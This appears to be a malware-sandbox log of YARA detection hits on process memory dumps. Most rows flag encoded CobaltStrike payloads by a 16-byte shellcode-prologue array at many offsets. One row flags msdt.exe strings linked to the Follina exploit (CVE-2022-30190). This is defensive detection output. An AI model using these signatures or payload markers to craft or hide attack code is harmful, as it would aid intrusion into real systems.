00000019.00000003.507642082.0000000005F41000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x13d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x33a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5380:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7358:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9330:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb318:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd300:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf2e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x112d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x132b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x152a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17298:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19290:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b288:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d280:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f278:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21270:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23278:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25280:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.567865973.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500590066.0000000006DBF000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x8b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3bb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.503439579.00000000066C0000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xe80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3890:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6298:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8ca0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb6a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe0b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10ac8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x134e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15ef8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18910:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b328:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1dd40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20768:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23190:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25bb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x285e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2b008:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2da40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x30478:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x32eb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.502667836.00000000067C0000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x9a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x34e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6028:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8b70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb6b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe200:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10d48:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x138a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x163f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18f50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1baa8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e600:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21168:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23cd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26838:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x293a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2bf08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ea70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x315e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.502479061.0000000006841000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x8f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x34b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6080:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8c48:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb810:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe3d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10fb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13b88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16760:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19338:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1bf10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1eaf8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x216e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x242c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26eb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29a98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c690:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2f288:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x31e80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x34a78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x37670:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507423559.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xf18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2fa0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5028:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x70b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9138:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb1d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd268:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf300:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11398:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13430:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x154c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17570:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19618:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b6c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d768:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f810:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x218c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23980:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.502365955.00000000067F3000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1160:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3cd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6850:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x93c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xbf50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xead8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11660:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x141e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16d70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x198f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c480:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f018:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21bb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24748:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x272e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29e78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ca20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2f5c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x32170:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x34d18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x378c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499804770.0000000006E61000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x210:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508327386.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1010:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2da8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508977198.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xaa8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4098:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5ba0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x76a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x91b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xacb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc7c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe2c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xfde0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508083711.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x8d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507943546.0000000005E86000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xa60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2918:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x47d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6688:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8540:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa408:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc2d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe198:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10060:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11f28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13df0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15cc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17ba0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19a78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b950:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d838:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f720:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21608:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x234f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x253d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x272c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500124456.0000000006E24000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2780:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499664750.0000000006E74000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xc30:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507900626.0000000005F40000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x3f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.502171014.0000000006880000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xa78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3680:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6288:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8e90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xbaa8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe6c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x112d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13ef0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16b08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19720:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c348:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1ef70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21b98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x247c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x273e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2a020:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2cc58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2f890:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x324c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x35110:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x37d58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.501943577.0000000006902000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xcf0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3988:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6620:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x92b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xbf50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xebf8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x118a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14548:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x171f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19e98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1cb40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f7f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x224b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25168:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27e20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2aad8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2d7a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x30468:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x33130:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x35df8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x38ac0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499900664.0000000006E4A000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x448:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.501775845.00000000069FF000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1520:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x42a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7040:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9dd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xcb70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf908:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x126a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15448:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x181f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1af98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1dd40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20ae8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507263765.000000000606A000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x12b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3418:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5580:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x76e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.505360761.00000000063EC000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1428:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3a40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6058:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8680:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xaca8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd2d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf8f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11f20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14558:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16b90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x191c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b800:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1de48:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20490:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22ad8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25120:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27778:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29dd0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c428:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ea80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x310e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000009.00000002.556829484.0000000000F58000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x9886:$a: PCWDiagnostic 0x15de4:$a: PCWDiagnostic 0x2e7c:$sa1: msdt.exe 0x8bb0:$sa1: msdt.exe 0x18b6e:$sa1: msdt.exe 0x193f2:$sb3: IT_BrowseForFile=
